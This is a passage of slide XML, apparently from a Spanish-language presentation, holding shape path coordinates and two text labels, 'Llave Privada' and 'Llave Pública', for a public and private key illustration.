                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4131600" y="3719550"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Privada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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6" name="Google Shape;266;p21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1165200" y="3719550"/>
            <a:ext cx="29355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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Llave Pública</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591532" y="306164"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
